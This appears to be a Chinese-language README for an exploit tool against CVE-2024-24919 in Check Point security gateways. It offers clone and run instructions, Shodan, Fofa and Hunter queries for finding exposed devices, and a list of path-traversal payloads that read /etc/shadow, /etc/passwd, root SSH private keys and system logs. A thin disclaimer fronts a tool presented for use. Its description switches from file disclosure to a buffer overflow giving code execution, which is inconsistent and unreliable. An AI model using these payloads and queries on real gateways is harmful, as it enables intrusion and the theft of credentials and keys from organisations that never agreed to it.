此仓库包含一个用于利用 Check Point 安全网关中 CVE-2024-24919 漏洞的工具。该工具是一个多目标扫描器,可以识别易受攻击的设备,同时也是一个单目标利用工具,可以完全控制受影响设备。
CVE-2024-24919 是一个高危信息泄露漏洞,允许攻击者远程读取 Check Point 安全网关上的任意文件。此漏洞可被利用来窃取敏感信息,例如密码和配置文件。
免责声明: 此工具仅用于教育目的。未经所有者明确同意,不得用于攻击易受攻击的系统。此工具的作者不对因使用该工具而造成的任何损害负责。
该利用工具通过向易受攻击的设备发送特制的 HTTP 请求来工作。该请求会触发设备固件中的缓冲区溢出,从而使攻击者能够执行任意代码。然后,该利用工具可用于完全控制设备。
git clone https://github.com/your-username/cve-2024-24919.git
cd cve-2024-24919
pip install -r requirements.txt
您可以扫描单个或多个目标!
python cve-2024-24919.py
# Hunter
Hunter: /product.name="Check Point SSL Network Extender"
# Shodan
SHODAN: http.title="Check Point SSL Network Extender"
# Fofa Query
FOFA: title="Check Point SSL Network Extender"

$ Tool paths : ```
'aCSHELL/../../../../../../../../../../../etc/passwd',
'aCSHELL/../../../../../../../../../../../etc/apache2/apache2.conf',
'aCSHELL/../../../../../../../../../../../etc/mysql/my.cnf',
'aCSHELL/../../../../../../../../../../../var/log/syslog',
'aCSHELL/../../../../../../../../../../../var/log/auth.log',
#'aCSHELL/../../../../../../../../../../../var/log/messages',
'aCSHELL/../../../../../../../../../../../etc/group',
'aCSHELL/../../../../../../../../../../../etc/shadow',
'aCSHELL/../../../../../../../../../../../root/.ssh/id_rsa',
'aCSHELL/../../../../../../../../../../../etc/hostname',
'aCSHELL/../../../../../../../../../../../etc/hosts',
'aCSHELL/../../../../../../../../../../../etc/resolv.conf' ```